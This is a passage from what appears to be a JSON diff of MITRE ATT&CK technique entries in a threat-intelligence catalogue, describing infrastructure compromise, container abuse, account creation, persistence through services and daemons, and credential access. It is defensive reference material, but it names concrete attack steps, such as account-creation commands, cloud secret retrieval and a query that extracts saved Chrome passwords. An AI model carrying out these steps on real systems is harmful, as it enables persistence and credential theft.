Server](https://app.tidalcyber.com/technique/2c04d7c8-67a3-4b1a-bd71-47b7c5a54b23), adversaries may compromise third-party servers in support of operations.\n\nAdversaries may also compromise web servers to support watering hole operations, as in [Drive-by Compromise](https://app.tidalcyber.com/technique/d4e46fe1-cc6d-4ef0-af72-a4e8dcd71381), or email servers to support [Phishing](https://app.tidalcyber.com/technique/d4a36624-50cb-43d3-95af-a2e10878a533) operations.", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1584.004" + }, + "related": [ + { + "dest-uuid": "989d09c2-12b8-4419-9b34-a328cf295fff", + "type": "uses" + } + ], + "uuid": "ce71e252-3403-4287-a0b5-9328fa88af96", + "value": "Server" + }, + { + "description": "Adversaries may compromise serverless cloud infrastructure, such as Cloudflare Workers or AWS Lambda functions, that can be used during targeting. By utilizing serverless infrastructure, adversaries can make it more difficult to attribute infrastructure used during operations back to them. \n\nOnce compromised, the serverless runtime environment can be leveraged to either respond directly to infected machines or to [Proxy](https://app.tidalcyber.com/technique/ba6a869a-c870-4be6-bc08-e078f0efdc3b) traffic to an adversary-owned command and control server.[[BlackWater Malware Cloudflare Workers](https://app.tidalcyber.com/references/053895e8-da3f-4291-a728-2198fde774e7)][[AWS Lambda Redirector](https://app.tidalcyber.com/references/9ba87a5d-a140-4959-9905-c4a80e684d56)] As traffic generated by these functions will appear to come from subdomains of common cloud providers, it may be difficult to distinguish from ordinary traffic to these providers.[[Detecting Command & Control in the Cloud](https://app.tidalcyber.com/references/b12e0288-48cd-46ec-8305-0f4d050782f2)][[BlackWater Malware Cloudflare Workers](https://app.tidalcyber.com/references/053895e8-da3f-4291-a728-2198fde774e7)]", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1584.007" + }, + "related": [ + { + "dest-uuid": "989d09c2-12b8-4419-9b34-a328cf295fff", + "type": "uses" + } + ], + "uuid": "f2b5a3e4-8a59-41f5-88c4-142f2da251c8", + "value": "Serverless" + }, + { + "description": "Adversaries may compromise third-party Virtual Private Servers (VPSs) that can be used during targeting. There exist a variety of cloud service providers that will sell virtual machines/containers as a service. Adversaries may compromise VPSs purchased by third-party entities. By compromising a VPS to use as infrastructure, adversaries can make it difficult to physically tie back operations to themselves.[[NSA NCSC Turla OilRig](https://app.tidalcyber.com/references/3e86a807-5188-4278-9a58-babd23b86410)]\n\nCompromising a VPS for use in later stages of the adversary lifecycle, such as Command and Control, can allow adversaries to benefit from the ubiquity and trust associated with higher reputation cloud service providers as well as that added by the compromised third-party.", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1584.003" + }, + "related": [ + { + "dest-uuid": "989d09c2-12b8-4419-9b34-a328cf295fff", + "type": "uses" + } + ], + "uuid": "3bd8c928-a7c8-4376-8f2f-2e0fcb449b37", + "value": "Virtual Private Server" + }, + { + "description": "Adversaries may compromise access to third-party web services that can be used during targeting. A variety of popular websites exist for legitimate users to register for web-based services, such as GitHub, Twitter, Dropbox, Google, SendGrid, etc. Adversaries may try to take ownership of a legitimate user's access to a web service and use that web service as infrastructure in support of cyber operations. Such web services can be abused during later stages of the adversary lifecycle, such as during Command and Control ([Web Service](https://app.tidalcyber.com/technique/a729feee-8e21-444e-8eea-2ec595b09931)), [Exfiltration Over Web Service](https://app.tidalcyber.com/technique/66768217-acdd-4b52-902f-e29483630ad6), or [Phishing](https://app.tidalcyber.com/technique/d4a36624-50cb-43d3-95af-a2e10878a533).[[Recorded Future Turla Infra 2020](https://app.tidalcyber.com/references/73aaff33-5a0e-40b7-a089-77ac57da8dca)] Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. By utilizing a web service, particularly when access is stolen from legitimate users, adversaries can make it difficult to physically tie back operations to them. Additionally, leveraging compromised web-based email services may allow adversaries to leverage the trust associated with legitimate domains.", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1584.006" + }, + "related": [ + { + "dest-uuid": "989d09c2-12b8-4419-9b34-a328cf295fff", + "type": "uses" + } + ], + "uuid": "ef312a77-6b1a-4be6-a220-3c689e7fcd9d", + "value": "Web Services" + }, + { + "description": "Adversaries may compromise third-party infrastructure that can be used during targeting. Infrastructure solutions include physical or cloud servers, domains, and third-party web and DNS services. Instead of buying, leasing, or renting infrastructure an adversary may compromise infrastructure and use it during other phases of the adversary lifecycle.[[Mandiant APT1](https://app.tidalcyber.com/references/865eba93-cf6a-4e41-bc09-de9b0b3c2669)][[ICANNDomainNameHijacking](https://app.tidalcyber.com/references/96c5ec6c-d53d-49c3-bca1-0b6abe0080e6)][[Talos DNSpionage Nov 2018](https://app.tidalcyber.com/references/d597ad7d-f808-4289-b42a-79807248c2d6)][[FireEye EPS Awakens Part 2](https://app.tidalcyber.com/references/7fd58ef5-a0b7-40b6-8771-ca5e87740965)] Additionally, adversaries may compromise numerous machines to form a botnet they can leverage.\n\nUse of compromised infrastructure allows adversaries to stage, launch, and execute operations. Compromised infrastructure can help adversary operations blend in with traffic that is seen as normal, such as contact with high reputation or trusted sites. For example, adversaries may leverage compromised infrastructure (potentially also in conjunction with [Digital Certificates](https://app.tidalcyber.com/technique/4c0db4e5-14e0-4fb7-88b0-bb391ce5ad58)) to further blend in and support staged information gathering and/or [Phishing](https://app.tidalcyber.com/technique/d4a36624-50cb-43d3-95af-a2e10878a533) campaigns.[[FireEye DNS Hijack 2019](https://app.tidalcyber.com/references/2c696e90-11eb-4196-9946-b5c4c11ccddc)] Additionally, adversaries may also compromise infrastructure to support [Proxy](https://app.tidalcyber.com/technique/ba6a869a-c870-4be6-bc08-e078f0efdc3b) and/or proxyware services.[[amnesty_nso_pegasus](https://app.tidalcyber.com/references/9e40d93a-fe91-504a-a6f2-e6546067ba53)][[Sysdig Proxyjacking](https://app.tidalcyber.com/references/26562be2-cab6-5867-9a43-d8a59c663596)]\n\nBy using compromised infrastructure, adversaries may make it difficult to tie their actions back to them. Prior to targeting, adversaries may compromise the infrastructure of other adversaries.[[NSA NCSC Turla OilRig](https://app.tidalcyber.com/references/3e86a807-5188-4278-9a58-babd23b86410)]", + "meta": { + "platforms": [ + "PRE" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "989d09c2-12b8-4419-9b34-a328cf295fff", + "type": "uses" + }, + { + "dest-uuid": "66caa162-711c-44ac-b96d-0552cf328f84", + "type": "similar" + }, + { + "dest-uuid": "83e4f633-67fb-4d87-b1b3-8a7a2e60778b", + "type": "similar" + }, + { + "dest-uuid": "581722ea-81a5-4c73-a703-2c994f1cf814", + "type": "similar" + }, + { + "dest-uuid": "ce71e252-3403-4287-a0b5-9328fa88af96", + "type": "similar" + }, + { + "dest-uuid": "f2b5a3e4-8a59-41f5-88c4-142f2da251c8", + "type": "similar" + }, + { + "dest-uuid": "3bd8c928-a7c8-4376-8f2f-2e0fcb449b37", + "type": "similar" + }, + { + "dest-uuid": "ef312a77-6b1a-4be6-a220-3c689e7fcd9d", + "type": "similar" + } + ], + "uuid": "c12d81d3-abe4-43d7-8a65-f4b3150e722d", + "value": "Compromise Infrastructure" + }, + { + "description": "Adversaries may abuse a container administration service to execute commands within a container. A container administration service such as the Docker daemon, the Kubernetes API server, or the kubelet may allow remote management of containers within an environment.[[Docker Daemon CLI](https://app.tidalcyber.com/references/ea86eae4-6ad4-4d79-9dd3-dd965a7feb5c)][[Kubernetes API](https://app.tidalcyber.com/references/5bdd1b82-9e5c-4db0-9764-240e37a1cc99)][[Kubernetes Kubelet](https://app.tidalcyber.com/references/57527fb9-d076-4ce1-afb5-e7bdb9c9d74c)]\n\nIn Docker, adversaries may specify an entrypoint during container deployment that executes a script or command, or they may use a command such as docker exec to execute a command within a running container.[[Docker Entrypoint](https://app.tidalcyber.com/references/c80ad3fd-d7fc-4a7a-8565-da3feaa4a915)][[Docker Exec](https://app.tidalcyber.com/references/5f1ace27-6584-4585-98de-52cb71d419c1)] In Kubernetes, if an adversary has sufficient permissions, they may gain remote execution in a container in the cluster via interaction with the Kubernetes API server, the kubelet, or by running a command such as kubectl exec.[[Kubectl Exec Get Shell](https://app.tidalcyber.com/references/ffb9c0ca-533f-4911-8c0c-a2653410a76d)]", + "meta": { + "platforms": [ + "Containers" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "dad2337d-6d35-410a-acc5-da36ff83ee44", + "type": "uses" + } + ], + "uuid": "0b9609dd-9f19-4747-ba6e-421b6b7ff03f", + "value": "Container Administration Command" + }, + { + "description": "Adversaries may attempt to discover containers and other resources that are available within a containers environment. Other resources may include images, deployments, pods, nodes, and other information such as the status of a cluster.\n\nThese resources can be viewed within web applications such as the Kubernetes dashboard or can be queried via the Docker and Kubernetes APIs.[[Docker API](https://app.tidalcyber.com/references/b8ec1e37-7286-40e8-9577-ff9c54801086)][[Kubernetes API](https://app.tidalcyber.com/references/5bdd1b82-9e5c-4db0-9764-240e37a1cc99)] In Docker, logs may leak information about the environment, such as the environment’s configuration, which services are available, and what cloud provider the victim may be utilizing. The discovery of these resources may inform an adversary’s next steps in the environment, such as how to perform lateral movement and which methods to utilize for execution. ", + "meta": { + "platforms": [ + "Containers" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "ee7e5a85-a940-46e4-b408-12956f3baafa", + "type": "uses" + } + ], + "uuid": "41c4b4cc-99da-4323-b0f4-229906578501", + "value": "Container and Resource Discovery" + }, + { + "description": "Adversaries may gain access and continuously communicate with victims by injecting malicious content into systems through online network traffic. Rather than luring victims to malicious payloads hosted on a compromised website (i.e., [Drive-by Target](https://app.tidalcyber.com/technique/f2661f07-9027-4d19-9028-d07b7511f3d5) followed by [Drive-by Compromise](https://app.tidalcyber.com/technique/d4e46fe1-cc6d-4ef0-af72-a4e8dcd71381)), adversaries may initially access victims through compromised data-transfer channels where they can manipulate traffic and/or inject their own content. These compromised online network channels may also be used to deliver additional payloads (i.e., [Ingress Tool Transfer](https://app.tidalcyber.com/technique/4499ce34-9871-4879-883c-19ddb940f242)) and other data to already compromised systems.[[ESET MoustachedBouncer](https://app.tidalcyber.com/references/6c85e925-d42b-590c-a424-14ebb49812bb)]\n\nAdversaries may inject content to victim systems in various ways, including:\n\n* From the middle, where the adversary is in-between legitimate online client-server communications (**Note:** this is similar but distinct from [Adversary-in-the-Middle](https://app.tidalcyber.com/technique/d98dbf30-c454-42ff-a9f3-2cd3319cc0d9), which describes AiTM activity solely within an enterprise environment) [[Kaspersky Encyclopedia MiTM](https://app.tidalcyber.com/references/353a6eb9-54c5-5211-ad87-abf5d941e503)]\n* From the side, where malicious content is injected and races to the client as a fake response to requests of a legitimate online server [[Kaspersky ManOnTheSide](https://app.tidalcyber.com/references/8ea545ac-cca6-5da5-8a93-6b07518fc9d4)]\n\nContent injection is often the result of compromised upstream communication channels, for example at the level of an internet service provider (ISP) as is the case with \"lawful interception.\"[[Kaspersky ManOnTheSide](https://app.tidalcyber.com/references/8ea545ac-cca6-5da5-8a93-6b07518fc9d4)][[ESET MoustachedBouncer](https://app.tidalcyber.com/references/6c85e925-d42b-590c-a424-14ebb49812bb)][[EFF China GitHub Attack](https://app.tidalcyber.com/references/b8405628-6366-5cc9-a9af-b97d5c9176dd)]", + "meta": { + "platforms": [ + "Linux", + "macOS", + "Windows" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "94ffe549-1c29-438d-9c7f-e27f7acee0bb", + "type": "uses" + }, + { + "dest-uuid": "586a5b49-c566-4a57-beb4-e7c667f9c34c", + "type": "uses" + } + ], + "uuid": "3f95e4f2-cd4a-502c-a12a-becb8d28440c", + "value": "Content Injection" + }, + { + "description": "Adversaries may create a cloud account to maintain access to victim systems. With a sufficient level of access, such accounts may be used to establish secondary credentialed access that does not require persistent remote access tools to be deployed on the system.[[Microsoft O365 Admin Roles](https://app.tidalcyber.com/references/8014a0cc-f793-4d9a-a2cc-ef9e9c5a826a)][[Microsoft Support O365 Add Another Admin, October 2019](https://app.tidalcyber.com/references/c31cfc48-289e-42aa-8046-b41261fdeb96)][[AWS Create IAM User](https://app.tidalcyber.com/references/bb474e88-b7bb-4b92-837c-95fe7bdd03f7)][[GCP Create Cloud Identity Users](https://app.tidalcyber.com/references/e91748b2-1432-4203-a1fe-100aa70458d2)][[Microsoft Azure AD Users](https://app.tidalcyber.com/references/b69468a2-693e-4bd0-8dc1-ccfd7d5630c0)]\n\nAdversaries may create accounts that only have access to specific cloud services, which can reduce the chance of detection.\n\nOnce an adversary has created a cloud account, they can then manipulate that account to ensure persistence and allow access to additional resources - for example, by adding [Additional Cloud Credentials](https://app.tidalcyber.com/technique/0799f2ee-3a83-452e-9fa9-83e91d83be25) or assigning [Additional Cloud Roles](https://app.tidalcyber.com/technique/71867386-ddc2-4cdb-a0c9-7c27172c23c1).", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1136.003" + }, + "related": [ + { + "dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393", + "type": "uses" + } + ], + "uuid": "d6504a4d-f6d7-4517-b0fd-ec7128d4dec9", + "value": "Cloud Account" + }, + { + "description": "Adversaries may create a domain account to maintain access to victim systems. Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain. Domain accounts can cover user, administrator, and service accounts. With a sufficient level of access, the net user /add /domain command can be used to create a domain account.\n\nSuch accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1136.002" + }, + "related": [ + { + "dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393", + "type": "uses" + } + ], + "uuid": "7a7e10ce-f033-460c-9183-5e29a9feb927", + "value": "Domain Account" + }, + { + "description": "Adversaries may create a local account to maintain access to victim systems. Local accounts are those configured by an organization for use by users, remote support, services, or for administration on a single system or service. \n\nFor example, with a sufficient level of access, the Windows net user /add command can be used to create a local account. On macOS systems the dscl -create command can be used to create a local account. Local accounts may also be added to network devices, often via common [Network Device CLI](https://app.tidalcyber.com/technique/284bfbb3-99f0-4c3d-bc1f-ab74065b7907) commands such as username, or to Kubernetes clusters using the `kubectl` utility.[[cisco_username_cmd](https://app.tidalcyber.com/references/8e7b99d7-ad94-5802-a1ee-6334842e7e0b)][[Kubernetes Service Accounts Security](https://app.tidalcyber.com/references/522eaa6b-0075-5346-bf3c-db1e7820aba2)]\n\nSuch accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1136.001" + }, + "related": [ + { + "dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393", + "type": "uses" + } + ], + "uuid": "287201c6-56c8-458d-a6b3-5d84ad1099d7", + "value": "Local Account" + }, + { + "description": "Adversaries may create an account to maintain access to victim systems. With a sufficient level of access, creating such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.\n\nAccounts may be created on the local system or within a domain or cloud tenant. In cloud environments, adversaries may create accounts that only have access to specific services, which can reduce the chance of detection.", + "meta": { + "platforms": [ + "Azure AD", + "Containers", + "Google Workspace", + "IaaS", + "Linux", + "macOS", + "Network", + "Office 365", + "SaaS", + "Windows" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393", + "type": "uses" + }, + { + "dest-uuid": "d6504a4d-f6d7-4517-b0fd-ec7128d4dec9", + "type": "similar" + }, + { + "dest-uuid": "7a7e10ce-f033-460c-9183-5e29a9feb927", + "type": "similar" + }, + { + "dest-uuid": "287201c6-56c8-458d-a6b3-5d84ad1099d7", + "type": "similar" + } + ], + "uuid": "55bcf759-a0bf-47e9-99f8-4e8ca997e6ce", + "value": "Create Account" + }, + { + "description": "Adversaries may create or modify launch agents to repeatedly execute malicious payloads as part of persistence. When a user logs in, a per-user launchd process is started which loads the parameters for each launch-on-demand user agent from the property list (.plist) file found in /System/Library/LaunchAgents, /Library/LaunchAgents, and ~/Library/LaunchAgents.[[AppleDocs Launch Agent Daemons](https://app.tidalcyber.com/references/310d18f8-6f9a-48b7-af12-6b921209d1ab)][[OSX Keydnap malware](https://app.tidalcyber.com/references/d43e0dd1-0946-4f49-bcc7-3ef38445eac3)] [[Antiquated Mac Malware](https://app.tidalcyber.com/references/165edb01-2681-45a3-b76b-4eb7dee5dab9)] Property list files use the Label, ProgramArguments , and RunAtLoad keys to identify the Launch Agent's name, executable location, and execution time.[[OSX.Dok Malware](https://app.tidalcyber.com/references/71d65081-dada-4a69-94c5-f1d8e4e151c1)] Launch Agents are often installed to perform updates to programs, launch user specified programs at login, or to conduct other developer tasks.\n\n Launch Agents can also be executed using the [Launchctl](https://app.tidalcyber.com/technique/8edc6345-c423-4872-9e22-11e22d9164ff) command.\n \nAdversaries may install a new Launch Agent that executes at login by placing a .plist file into the appropriate folders with the RunAtLoad or KeepAlive keys set to true.[[Sofacy Komplex Trojan](https://app.tidalcyber.com/references/a21be45e-26c3-446d-b336-b58d08df5749)][[Methods of Mac Malware Persistence](https://app.tidalcyber.com/references/44154472-2894-4161-b23f-46d1b1fd6772)] The Launch Agent name may be disguised by using a name from the related operating system or benign software. Launch Agents are created with user level privileges and execute with user level permissions.[[OSX Malware Detection](https://app.tidalcyber.com/references/0df0e28a-3c0b-4418-9f5a-77fffe37ac8a)][[OceanLotus for OS X](https://app.tidalcyber.com/references/6e9acc29-06af-4915-8e01-7dcccb204530)] ", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1543.001" + }, + "related": [ + { + "dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393", + "type": "uses" + }, + { + "dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37", + "type": "uses" + } + ], + "uuid": "6dbe030c-5f87-4b45-9b6b-5bba2c0fad00", + "value": "Launch Agent" + }, + { + "description": "Adversaries may create or modify Launch Daemons to execute malicious payloads as part of persistence. Launch Daemons are plist files used to interact with Launchd, the service management framework used by macOS. Launch Daemons require elevated privileges to install, are executed for every user on a system prior to login, and run in the background without the need for user interaction. During the macOS initialization startup, the launchd process loads the parameters for launch-on-demand system-level daemons from plist files found in /System/Library/LaunchDaemons/ and /Library/LaunchDaemons/. Required Launch Daemons parameters include a Label to identify the task, Program to provide a path to the executable, and RunAtLoad to specify when the task is run. Launch Daemons are often used to provide access to shared resources, updates to software, or conduct automation tasks.[[AppleDocs Launch Agent Daemons](https://app.tidalcyber.com/references/310d18f8-6f9a-48b7-af12-6b921209d1ab)][[Methods of Mac Malware Persistence](https://app.tidalcyber.com/references/44154472-2894-4161-b23f-46d1b1fd6772)][[launchd Keywords for plists](https://app.tidalcyber.com/references/1bcd2a93-93e7-48d8-ad25-6f09e94123aa)]\n\nAdversaries may install a Launch Daemon configured to execute at startup by using the RunAtLoad parameter set to true and the Program parameter set to the malicious executable path. The daemon name may be disguised by using a name from a related operating system or benign software (i.e. [Masquerading](https://app.tidalcyber.com/technique/a0adacc1-8d2a-4e0b-92c1-3766264df4fd)). When the Launch Daemon is executed, the program inherits administrative permissions.[[WireLurker](https://app.tidalcyber.com/references/fd33f71b-767d-4312-a8c9-5446939bb5ae)][[OSX Malware Detection](https://app.tidalcyber.com/references/0df0e28a-3c0b-4418-9f5a-77fffe37ac8a)]\n\nAdditionally, system configuration changes (such as the installation of third party package managing software) may cause folders such as usr/local/bin to become globally writeable. So, it is possible for poor configurations to allow an adversary to modify executables referenced by current Launch Daemon's plist files.[[LaunchDaemon Hijacking](https://app.tidalcyber.com/references/51d1e4d9-265a-48ca-834b-4daa1f386bb4)][[sentinelone macos persist Jun 2019](https://app.tidalcyber.com/references/81a49043-cac5-40e0-a626-fd242d21c56d)]", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1543.004" + }, + "related": [ + { + "dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393", + "type": "uses" + }, + { + "dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37", + "type": "uses" + } + ], + "uuid": "eff618a9-6498-4b01-bca1-cd5f3784fc27", + "value": "Launch Daemon" + }, + { + "description": "Adversaries may create or modify systemd services to repeatedly execute malicious payloads as part of persistence. Systemd is a system and service manager commonly used for managing background daemon processes (also known as services) and other system resources.[[Linux man-pages: systemd January 2014](https://app.tidalcyber.com/references/e9a58efd-8de6-40c9-9638-c642311d6a07)] Systemd is the default initialization (init) system on many Linux distributions replacing legacy init systems, including SysVinit and Upstart, while remaining backwards compatible. \n\nSystemd utilizes unit configuration files with the `.service` file extension to encode information about a service's process. By default, system level unit files are stored in the `/systemd/system` directory of the root owned directories (`/`). User level unit files are stored in the `/systemd/user` directories of the user owned directories (`$HOME`).[[lambert systemd 2022](https://app.tidalcyber.com/references/196f0c77-4c98-57e7-ad79-eb43bdd2c848)] \n\nInside the `.service` unit files, the following directives are used to execute commands:[[freedesktop systemd.service](https://app.tidalcyber.com/references/cae49a7a-db3b-5202-ba45-fbfa98b073c9)] \n\n* `ExecStart`, `ExecStartPre`, and `ExecStartPost` directives execute when a service is started manually by `systemctl` or on system start if the service is set to automatically start.\n* `ExecReload` directive executes when a service restarts. \n* `ExecStop`, `ExecStopPre`, and `ExecStopPost` directives execute when a service is stopped. \n\nAdversaries have created new service files, altered the commands a `.service` file’s directive executes, and modified the user directive a `.service` file executes as, which could result in privilege escalation. Adversaries may also place symbolic links in these directories, enabling systemd to find these payloads regardless of where they reside on the filesystem.[[Anomali Rocke March 2019](https://app.tidalcyber.com/references/31051c8a-b523-4b8e-b834-2168c59e783b)][[airwalk backdoor unix systems](https://app.tidalcyber.com/references/3f3bca4a-68fa-5d4a-b86f-36f82345ff36)][[Rapid7 Service Persistence 22JUNE2016](https://app.tidalcyber.com/references/75441af3-2ff6-42c8-b7f1-c8dc2c27efe2)] ", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1543.002" + }, + "related": [ + { + "dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393", + "type": "uses" + }, + { + "dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37", + "type": "uses" + } + ], + "uuid": "7aae1ad0-fb1f-484a-a176-c94e4c7ada77", + "value": "Systemd Service" + }, + { + "description": "Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.[[TechNet Services](https://app.tidalcyber.com/references/b50a3c2e-e997-4af5-8be0-3a8b3a959827)] Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.\n\nAdversaries may install a new service or modify an existing service to execute at startup in order to persist on a system. Service configurations can be set or modified using system utilities (such as sc.exe), by directly modifying the Registry, or by interacting directly with the Windows API. \n\nAdversaries may also use services to install and execute malicious drivers. For example, after dropping a driver file (ex: `.sys`) to disk, the payload can be loaded and registered via [Native API](https://app.tidalcyber.com/technique/1120f5ec-ef1b-4596-8d8b-a3979a766560) functions such as `CreateServiceW()` (or manually via functions such as `ZwLoadDriver()` and `ZwSetValueKey()`), by creating the required service Registry values (i.e. [Modify Registry](https://app.tidalcyber.com/technique/0dfeab84-3c42-4b56-9021-70fe5be4092b)), or by using command-line utilities such as `PnPUtil.exe`.[[Symantec W.32 Stuxnet Dossier](https://app.tidalcyber.com/references/ef65ab18-fd84-4098-8805-df0268fc3a38)][[Crowdstrike DriveSlayer February 2022](https://app.tidalcyber.com/references/4f01e901-58f8-4fdb-ac8c-ef4b6bfd068e)][[Unit42 AcidBox June 2020](https://app.tidalcyber.com/references/f3f2eca0-fda3-451e-bf13-aacb14668e48)] Adversaries may leverage these drivers as [Rootkit](https://app.tidalcyber.com/technique/cf2b56f6-3ebd-48ec-b9d9-835397acef89)s to hide the presence of malicious activity on a system. Adversaries may also load a signed yet vulnerable driver onto a compromised machine (known as \"Bring Your Own Vulnerable Driver\" (BYOVD)) as part of [Exploitation for Privilege Escalation](https://app.tidalcyber.com/technique/9cc715d7-9969-485f-87a2-c9f7ed3cc44c).[[ESET InvisiMole June 2020](https://app.tidalcyber.com/references/d10cfda8-8fd8-4ada-8c61-dba6065b0bac)][[Unit42 AcidBox June 2020](https://app.tidalcyber.com/references/f3f2eca0-fda3-451e-bf13-aacb14668e48)]\n\nServices may be created with administrator privileges but are executed under SYSTEM privileges, so an adversary may also use a service to escalate privileges. Adversaries may also directly start services through [Service Execution](https://app.tidalcyber.com/technique/68427c7d-f65a-4545-abfd-13d69e5e50cf). To make detection analysis more challenging, malicious services may also incorporate [Masquerade Task or Service](https://app.tidalcyber.com/technique/86c2f355-3c97-44c1-9a83-e3d016f50535) (ex: using a service and/or payload name related to a legitimate OS or benign software component).", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1543.003" + }, + "related": [ + { + "dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393", + "type": "uses" + }, + { + "dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37", + "type": "uses" + } + ], + "uuid": "31c6dd3c-3eb2-46a9-ab85-9e8e145810a1", + "value": "Windows Service" + }, + { + "description": "Adversaries may create or modify system-level processes to repeatedly execute malicious payloads as part of persistence. When operating systems boot up, they can start processes that perform background system functions. On Windows and Linux, these system processes are referred to as services.[[TechNet Services](https://app.tidalcyber.com/references/b50a3c2e-e997-4af5-8be0-3a8b3a959827)] On macOS, launchd processes known as [Launch Daemon](https://app.tidalcyber.com/technique/eff618a9-6498-4b01-bca1-cd5f3784fc27) and [Launch Agent](https://app.tidalcyber.com/technique/6dbe030c-5f87-4b45-9b6b-5bba2c0fad00) are run to finish system initialization and load user specific parameters.[[AppleDocs Launch Agent Daemons](https://app.tidalcyber.com/references/310d18f8-6f9a-48b7-af12-6b921209d1ab)] \n\nAdversaries may install new services, daemons, or agents that can be configured to execute at startup or a repeatable interval in order to establish persistence. Similarly, adversaries may modify existing services, daemons, or agents to achieve the same effect. \n\nServices, daemons, or agents may be created with administrator privileges but executed under root/SYSTEM privileges. Adversaries may leverage this functionality to create or modify system processes in order to escalate privileges.[[OSX Malware Detection](https://app.tidalcyber.com/references/0df0e28a-3c0b-4418-9f5a-77fffe37ac8a)] ", + "meta": { + "platforms": [ + "Linux", + "macOS", + "Windows" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393", + "type": "uses" + }, + { + "dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37", + "type": "uses" + }, + { + "dest-uuid": "6dbe030c-5f87-4b45-9b6b-5bba2c0fad00", + "type": "similar" + }, + { + "dest-uuid": "eff618a9-6498-4b01-bca1-cd5f3784fc27", + "type": "similar" + }, + { + "dest-uuid": "7aae1ad0-fb1f-484a-a176-c94e4c7ada77", + "type": "similar" + }, + { + "dest-uuid": "31c6dd3c-3eb2-46a9-ab85-9e8e145810a1", + "type": "similar" + } + ], + "uuid": "f8aa018b-5134-4201-87f2-e55d20f40b17", + "value": "Create or Modify System Process" + }, + { + "description": "Adversaries may acquire credentials from cloud-native secret management solutions such as AWS Secrets Manager, GCP Secret Manager, Azure Key Vault, and Terraform Vault. \n\nSecrets managers support the secure centralized management of passwords, API keys, and other credential material. Where secrets managers are in use, cloud services can dynamically acquire credentials via API requests rather than accessing secrets insecurely stored in plain text files or environment variables. \n\nIf an adversary is able to gain sufficient privileges in a cloud environment – for example, by obtaining the credentials of high-privileged [Cloud Accounts](https://app.tidalcyber.com/technique/3c4a2f3a-5877-4a27-a417-76318523657e) or compromising a service that has permission to retrieve secrets – they may be able to request secrets from the secrets manager. This can be accomplished via commands such as `get-secret-value` in AWS, `gcloud secrets describe` in GCP, and `az key vault secret show` in Azure.[[Permiso Scattered Spider 2023](https://app.tidalcyber.com/references/020b97ab-466d-52e6-b1f1-6f9f8ffdabf0)][[Sysdig ScarletEel 2.0 2023](https://app.tidalcyber.com/references/285266e7-7a62-5f98-9b0f-fefde4b21c88)][[AWS Secrets Manager](https://app.tidalcyber.com/references/ec87e183-3018-5cac-9fab-711003be54f7)][[Google Cloud Secrets](https://app.tidalcyber.com/references/4a9e631d-3588-5585-b00a-316a934e6009)][[Microsoft Azure Key Vault](https://app.tidalcyber.com/references/8f076aae-38c0-5335-9f7a-1e29b90fc33f)]\n\n**Note:** this technique is distinct from [Cloud Instance Metadata API](https://app.tidalcyber.com/technique/a5a95893-d837-424a-979f-095a47dd9f34) in that the credentials are being directly requested from the cloud secrets manager, rather than through the medium of the instance metadata API.", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1555.006" + }, + "related": [ + { + "dest-uuid": "0c3132d5-c0df-4793-b5f2-1a95bd64ab53", + "type": "uses" + } + ], + "uuid": "260571a6-3c08-5419-98c5-3fa1aa8e675d", + "value": "Cloud Secrets Management Stores" + }, + { + "description": "Adversaries may acquire credentials from web browsers by reading files specific to the target browser.[[Talos Olympic Destroyer 2018](https://app.tidalcyber.com/references/25a2e179-7abd-4091-8af4-e9d2bf24ef11)] Web browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future. Web browsers typically store the credentials in an encrypted format within a credential store; however, methods exist to extract plaintext credentials from web browsers.\n\nFor example, on Windows systems, encrypted credentials may be obtained from Google Chrome by reading a database file, AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data and executing a SQL query: SELECT action_url, username_value, password_value FROM logins;. The plaintext password can then be obtained by passing the encrypted credentials to the Windows API function CryptUnprotectData, which uses the victim’s cached logon credentials as the decryption key.[[Microsoft CryptUnprotectData April 2018](https://app.tidalcyber.com/references/258088ae-96c2-4520-8eb5-1a7e540a9a24)]\n \nAdversaries have executed similar procedures for common web browsers such as FireFox, Safari, Edge, etc.[[Proofpoint Vega Credential Stealer May 2018](https://app.tidalcyber.com/references/c52fe62f-4df4-43b0-a126-2df07dc61fc0)][[FireEye 